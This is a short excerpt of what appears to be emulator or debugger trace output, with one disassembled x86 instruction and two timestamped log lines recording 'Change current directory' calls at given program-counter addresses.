0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:19.121745643Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:19.126997085Z 59 PC: 12da6 | Change current directory